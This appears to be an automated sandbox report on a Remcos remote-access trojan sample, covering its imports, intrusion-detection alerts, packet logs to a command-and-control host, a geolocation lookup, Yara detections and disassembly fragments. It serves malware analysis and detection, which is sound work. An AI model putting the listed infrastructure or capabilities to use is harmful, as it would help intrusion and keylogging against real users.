                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x55f2d0x56000c9fb1fecb5f01a3c88e2bc00eccd57c4False0.5739377043968024data6.621523378040251IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x570000x18b000x18c000ba285a9a28b1dec254a7539ab18f8d0False0.4981455176767677OpenPGP Secret Key Version 65.75873851406894IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x700000x5d8c0xe0006414e748130e7e668ba2ba172d63448False0.22684151785714285data3.093339598098017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x760000x4b400x4c009ecd6f0b726b681984dce52406e263acFalse0.2829461348684211data3.9860864635240127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x7b0000x3b880x3c00b875bbd60cc90da8a22f40034fe9606eFalse0.7575520833333333data6.702930468027394IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x7618c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                                      RT_ICON0x765f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27704918032786885
                                      RT_ICON0x76f7c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.23686679174484052
                                      RT_ICON0x780240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22977178423236513
                                      RT_RCDATA0x7a5cc0x532COM executable for DOS1.0082706766917293
                                      RT_GROUP_ICON0x7ab000x3edataEnglishUnited States0.8064516129032258

                                      Imports

                                      DLLImport
                                      KERNEL32.dllExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, LoadLibraryA, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, SetConsoleOutputCP, FormatMessageA, FindFirstFileA, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, HeapReAlloc, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetModuleHandleExW, MoveFileExW, LoadLibraryExW, RaiseException, RtlUnwind, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, MultiByteToWideChar, DecodePointer, EncodePointer, TlsFree, TlsSetValue, GetFileSize, TerminateThread, GetLastError, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, CreateDirectoryW, GetLogicalDriveStringsA, DeleteFileW, FindNextFileA, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, GetProcAddress, CreateMutexA, GetCurrentProcess, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, FindNextVolumeW, TlsGetValue, TlsAlloc, SwitchToThread, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, InitializeCriticalSectionAndSpinCount, SetEndOfFile
                                      USER32.dllDefWindowProcA, TranslateMessage, DispatchMessageA, GetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CreateWindowExA, SendInput, EnumDisplaySettingsW, mouse_event, MapVirtualKeyA, TrackPopupMenu, CreatePopupMenu, AppendMenuA, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetIconInfo, GetSystemMetrics, CloseWindow, DrawIcon
                                      GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteDC, DeleteObject, CreateDCA, GetObjectA, SelectObject
                                      ADVAPI32.dllLookupPrivilegeValueA, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, RegDeleteKeyA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW
                                      SHELL32.dllShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                                      ole32.dllCoInitializeEx, CoGetObject, CoUninitialize
                                      SHLWAPI.dllStrToIntA, PathFileExistsW, PathFileExistsA
                                      WINMM.dllmciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInStart, waveInUnprepareHeader, waveInOpen, waveInAddBuffer, waveInPrepareHeader, PlaySoundW
                                      WS2_32.dllsend, WSAStartup, socket, connect, WSAGetLastError, recv, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, gethostbyname
                                      urlmon.dllURLOpenBlockingStreamW, URLDownloadToFileW
                                      gdiplus.dllGdipAlloc, GdiplusStartup, GdipGetImageEncoders, GdipLoadImageFromStream, GdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipCloneImage
                                      WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2025-01-08T16:00:33.207020+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.849705179.15.136.61997TCP
                                      2025-01-08T16:00:35.337900+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.849706178.237.33.5080TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 8, 2025 16:00:32.521557093 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:00:32.526746988 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:00:32.526808977 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:00:32.532689095 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:00:32.538913012 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:00:33.162544966 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:00:33.207020044 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:00:33.292570114 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:00:33.297261000 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:00:33.302021027 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:00:33.302094936 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:00:33.306893110 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:00:33.306981087 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:00:33.311758041 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:00:33.653808117 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:00:33.656246901 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:00:33.661036968 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:00:33.789319992 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:00:33.831995964 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:00:34.709388018 CET4970680192.168.2.8178.237.33.50
                                      Jan 8, 2025 16:00:34.714263916 CET8049706178.237.33.50192.168.2.8
                                      Jan 8, 2025 16:00:34.714356899 CET4970680192.168.2.8178.237.33.50
                                      Jan 8, 2025 16:00:34.714498997 CET4970680192.168.2.8178.237.33.50
                                      Jan 8, 2025 16:00:34.719269991 CET8049706178.237.33.50192.168.2.8
                                      Jan 8, 2025 16:00:35.337820053 CET8049706178.237.33.50192.168.2.8
                                      Jan 8, 2025 16:00:35.337899923 CET4970680192.168.2.8178.237.33.50
                                      Jan 8, 2025 16:00:35.357176065 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:00:35.361964941 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:00:36.352863073 CET8049706178.237.33.50192.168.2.8
                                      Jan 8, 2025 16:00:36.352982998 CET4970680192.168.2.8178.237.33.50
                                      Jan 8, 2025 16:00:37.058690071 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:00:37.060376883 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:00:37.065135956 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:01:07.051949978 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:01:07.053483963 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:01:07.058523893 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:01:37.083986044 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:01:37.085567951 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:01:37.090348959 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:02:07.109252930 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:02:07.111685038 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:02:07.116564989 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:02:24.691879034 CET4970680192.168.2.8178.237.33.50
                                      Jan 8, 2025 16:02:25.160372019 CET4970680192.168.2.8178.237.33.50
                                      Jan 8, 2025 16:02:25.863492966 CET4970680192.168.2.8178.237.33.50
                                      Jan 8, 2025 16:02:27.162488937 CET4970680192.168.2.8178.237.33.50
                                      Jan 8, 2025 16:02:29.660361052 CET4970680192.168.2.8178.237.33.50
                                      Jan 8, 2025 16:02:34.503794909 CET4970680192.168.2.8178.237.33.50
                                      Jan 8, 2025 16:02:37.077929020 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:02:37.079616070 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:02:37.085167885 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:02:44.254204988 CET4970680192.168.2.8178.237.33.50
                                      Jan 8, 2025 16:03:07.119739056 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:03:07.121289015 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:03:07.126118898 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:03:37.252716064 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:03:37.254055023 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:03:37.258866072 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:03:41.824778080 CET199749705179.15.136.6192.168.2.8
                                      Jan 8, 2025 16:03:41.894922972 CET497051997192.168.2.8179.15.136.6
                                      Jan 8, 2025 16:03:42.204591990 CET497051997192.168.2.8179.15.136.6

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 8, 2025 16:00:32.362035036 CET5302253192.168.2.81.1.1.1
                                      Jan 8, 2025 16:00:32.517834902 CET53530221.1.1.1192.168.2.8
                                      Jan 8, 2025 16:00:34.698679924 CET5653953192.168.2.81.1.1.1
                                      Jan 8, 2025 16:00:34.705800056 CET53565391.1.1.1192.168.2.8

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jan 8, 2025 16:00:32.362035036 CET192.168.2.81.1.1.10xbbc3Standard query (0)luiscaseres.gleeze.comA (IP address)IN (0x0001)false
                                      Jan 8, 2025 16:00:34.698679924 CET192.168.2.81.1.1.10x40b1Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jan 8, 2025 16:00:32.517834902 CET1.1.1.1192.168.2.80xbbc3No error (0)luiscaseres.gleeze.com179.15.136.6A (IP address)IN (0x0001)false
                                      Jan 8, 2025 16:00:34.705800056 CET1.1.1.1192.168.2.80x40b1No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • geoplugin.net

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.849706178.237.33.50807784C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 8, 2025 16:00:34.714498997 CET71OUTGET /json.gp HTTP/1.1
                                      Host: geoplugin.net
                                      Cache-Control: no-cache
                                      Jan 8, 2025 16:00:35.337820053 CET1171INHTTP/1.1 200 OK
                                      date: Wed, 08 Jan 2025 15:00:35 GMT
                                      server: Apache
                                      content-length: 963
                                      content-type: application/json; charset=utf-8
                                      cache-control: public, max-age=300
                                      access-control-allow-origin: *
                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                      Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:10:00:31
                                      Start date:08/01/2025
                                      Path:C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe"
                                      Imagebase:0x400000
                                      File size:493'056 bytes
                                      MD5 hash:FA48843CE9A50A4BC84F6996923B7A27
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.3307627880.000000000224F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:10:03:41
                                      Start date:08/01/2025
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs"
                                      Imagebase:0x410000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:4.5%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:20.9%
                                        Total number of Nodes:1452
                                        Total number of Limit Nodes:65
                                        execution_graph 46412 41d4e0 46413 41d4f6 ctype ___scrt_fastfail 46412->46413 46415 431fa9 21 API calls 46413->46415 46427 41d6f3 46413->46427 46419 41d6a6 ___scrt_fastfail 46415->46419 46416 41d704 46417 41d744 46416->46417 46425 41d770 46416->46425 46429 431fa9 46416->46429 46419->46417 46420 431fa9 21 API calls 46419->46420 46423 41d6ce ___scrt_fastfail 46420->46423 46422 41d73d ___scrt_fastfail 46422->46417 46434 43265f 46422->46434 46423->46417 46426 431fa9 21 API calls 46423->46426 46425->46417 46437 41d484 21 API calls ___scrt_fastfail 46425->46437 46426->46427 46427->46417 46428 41d081 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46427->46428 46428->46416 46430 431fb3 46429->46430 46431 431fb7 46429->46431 46430->46422 46438 43a89c 46431->46438 46447 43257f 46434->46447 46436 432667 46436->46425 46437->46417 46442 446b0f _strftime 46438->46442 46439 446b4d 46446 445364 20 API calls __dosmaperr 46439->46446 46441 446b38 RtlAllocateHeap 46441->46442 46443 431fbc 46441->46443 46442->46439 46442->46441 46445 442210 7 API calls 2 library calls 46442->46445 46443->46422 46445->46442 46446->46443 46448 432598 46447->46448 46452 43258e 46447->46452 46449 431fa9 21 API calls 46448->46449 46448->46452 46450 4325b9 46449->46450 46450->46452 46453 43294a CryptAcquireContextA 46450->46453 46452->46436 46454 432966 46453->46454 46455 43296b CryptGenRandom 46453->46455 46454->46452 46455->46454 46456 432980 CryptReleaseContext 46455->46456 46456->46454 46457 426040 46462 426107 recv 46457->46462 46463 44e8c6 46464 44e8d1 46463->46464 46465 44e8f9 46464->46465 46466 44e8ea 46464->46466 46468 44e908 46465->46468 46485 455583 27 API calls 2 library calls 46465->46485 46484 445364 20 API calls __dosmaperr 46466->46484 46472 44b9ce 46468->46472 46471 44e8ef ___scrt_fastfail 46473 44b9e6 46472->46473 46474 44b9db 46472->46474 46476 44b9ee 46473->46476 46482 44b9f7 _strftime 46473->46482 46492 446b0f 21 API calls 3 library calls 46474->46492 46486 446ad5 46476->46486 46477 44ba21 RtlReAllocateHeap 46481 44b9e3 46477->46481 46477->46482 46478 44b9fc 46493 445364 20 API calls __dosmaperr 46478->46493 46481->46471 46482->46477 46482->46478 46494 442210 7 API calls 2 library calls 46482->46494 46484->46471 46485->46468 46487 446ae0 RtlFreeHeap 46486->46487 46488 446b09 _free 46486->46488 46487->46488 46489 446af5 46487->46489 46488->46481 46495 445364 20 API calls __dosmaperr 46489->46495 46491 446afb GetLastError 46491->46488 46492->46481 46493->46481 46494->46482 46495->46491 46496 4260a1 46501 42611e send 46496->46501 46502 425e66 46503 425e7b 46502->46503 46506 425f1b 46502->46506 46504 425f35 46503->46504 46505 425f6a 46503->46505 46503->46506 46507 425ec9 46503->46507 46508 425f87 46503->46508 46509 425fae 46503->46509 46515 425efe 46503->46515 46530 424364 50 API calls ctype 46503->46530 46504->46505 46504->46506 46533 41f085 54 API calls 46504->46533 46505->46508 46534 424b8b 21 API calls 46505->46534 46507->46506 46507->46515 46531 41f085 54 API calls 46507->46531 46508->46506 46508->46509 46518 424f88 46508->46518 46509->46506 46535 4255d7 28 API calls 46509->46535 46515->46504 46515->46506 46532 424364 50 API calls ctype 46515->46532 46519 424fa7 ___scrt_fastfail 46518->46519 46521 424fb6 46519->46521 46524 424fdb 46519->46524 46536 41e0a7 21 API calls 46519->46536 46521->46524 46529 424fbb 46521->46529 46537 41fae4 47 API calls 46521->46537 46524->46509 46525 424fc4 46525->46524 46539 424195 21 API calls 2 library calls 46525->46539 46527 42505e 46527->46524 46528 431fa9 21 API calls 46527->46528 46528->46529 46529->46524 46529->46525 46538 41cf7e 50 API calls 46529->46538 46530->46507 46531->46507 46532->46504 46533->46504 46534->46508 46535->46506 46536->46521 46537->46527 46538->46525 46539->46524 46540 43a9a8 46542 43a9b4 _swprintf __FrameHandler3::FrameUnwindToState 46540->46542 46541 43a9c2 46558 445364 20 API calls __dosmaperr 46541->46558 46542->46541 46545 43a9ec 46542->46545 46544 43a9c7 46559 43a837 26 API calls _Deallocate 46544->46559 46553 444adc EnterCriticalSection 46545->46553 46548 43a9f7 46554 43aa98 46548->46554 46551 43a9d2 __fread_nolock 46553->46548 46556 43aaa6 46554->46556 46555 43aa02 46560 43aa1f LeaveCriticalSection std::_Lockit::~_Lockit 46555->46560 46556->46555 46561 448426 39 API calls 2 library calls 46556->46561 46558->46544 46559->46551 46560->46551 46561->46556 46562 414dba 46577 41a52b 46562->46577 46564 414dc3 46587 401fbd 46564->46587 46568 414dde 46569 4161f2 46568->46569 46592 401eea 46568->46592 46596 401d8c 46569->46596 46572 4161fb 46573 401eea 26 API calls 46572->46573 46574 416207 46573->46574 46575 401eea 26 API calls 46574->46575 46576 416213 46575->46576 46578 41a539 46577->46578 46579 43a89c ___std_exception_copy 21 API calls 46578->46579 46580 41a543 InternetOpenW InternetOpenUrlW 46579->46580 46581 41a56c InternetReadFile 46580->46581 46585 41a58f 46581->46585 46582 41a5bc InternetCloseHandle InternetCloseHandle 46584 41a5ce 46582->46584 46584->46564 46585->46581 46585->46582 46586 401eea 26 API calls 46585->46586 46602 401f86 46585->46602 46586->46585 46588 401fcc 46587->46588 46611 402501 46588->46611 46590 401fea 46591 404468 60 API calls ctype 46590->46591 46591->46568 46593 4021b9 46592->46593 46594 4021e8 46593->46594 46616 40262e 26 API calls _Deallocate 46593->46616 46594->46569 46597 40200a 46596->46597 46601 40203a 46597->46601 46617 402654 26 API calls 46597->46617 46599 40202b 46618 4026ba 26 API calls _Deallocate 46599->46618 46601->46572 46603 401f8e 46602->46603 46606 402325 46603->46606 46605 401fa4 46605->46585 46607 40232f 46606->46607 46609 40233a 46607->46609 46610 40294a 28 API calls 46607->46610 46609->46605 46610->46609 46612 40250d 46611->46612 46614 40252b 46612->46614 46615 40261a 28 API calls 46612->46615 46614->46590 46615->46614 46616->46594 46617->46599 46618->46601 46619 402bcc 46620 402bd7 46619->46620 46621 402bdf 46619->46621 46637 403315 28 API calls _Deallocate 46620->46637 46622 402beb 46621->46622 46627 4015d3 46621->46627 46625 402bdd 46629 43361d 46627->46629 46628 43a89c ___std_exception_copy 21 API calls 46628->46629 46629->46628 46630 402be9 46629->46630 46632 43363e std::_Facet_Register 46629->46632 46638 442210 7 API calls 2 library calls 46629->46638 46633 433dfc std::_Facet_Register 46632->46633 46639 437be7 RaiseException 46632->46639 46640 437be7 RaiseException 46633->46640 46635 433e19 46637->46625 46638->46629 46639->46633 46640->46635 46641 4339ce 46642 4339da __FrameHandler3::FrameUnwindToState 46641->46642 46673 4336c3 46642->46673 46644 4339e1 46645 433b34 46644->46645 46648 433a0b 46644->46648 46973 433b54 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46645->46973 46647 433b3b 46974 4426ce 28 API calls _Atexit 46647->46974 46660 433a4a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46648->46660 46967 4434e1 5 API calls _ValidateLocalCookies 46648->46967 46650 433b41 46975 442680 28 API calls _Atexit 46650->46975 46653 433a24 46655 433a2a 46653->46655 46968 443485 5 API calls _ValidateLocalCookies 46653->46968 46654 433b49 46657 433aab 46684 433c6e 46657->46684 46660->46657 46969 43ee04 38 API calls 3 library calls 46660->46969 46667 433acd 46667->46647 46668 433ad1 46667->46668 46669 433ada 46668->46669 46971 442671 28 API calls _Atexit 46668->46971 46972 433852 13 API calls 2 library calls 46669->46972 46672 433ae2 46672->46655 46674 4336cc 46673->46674 46976 433e1a IsProcessorFeaturePresent 46674->46976 46676 4336d8 46977 4379fe 10 API calls 3 library calls 46676->46977 46678 4336e1 46678->46644 46679 4336dd 46679->46678 46978 44336e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46679->46978 46681 4336ea 46682 4336f8 46681->46682 46979 437a27 8 API calls 3 library calls 46681->46979 46682->46644 46980 436060 46684->46980 46687 433ab1 46688 443432 46687->46688 46982 44ddd9 46688->46982 46690 44343b 46692 433aba 46690->46692 46986 44e0e3 38 API calls 46690->46986 46693 40d767 46692->46693 46988 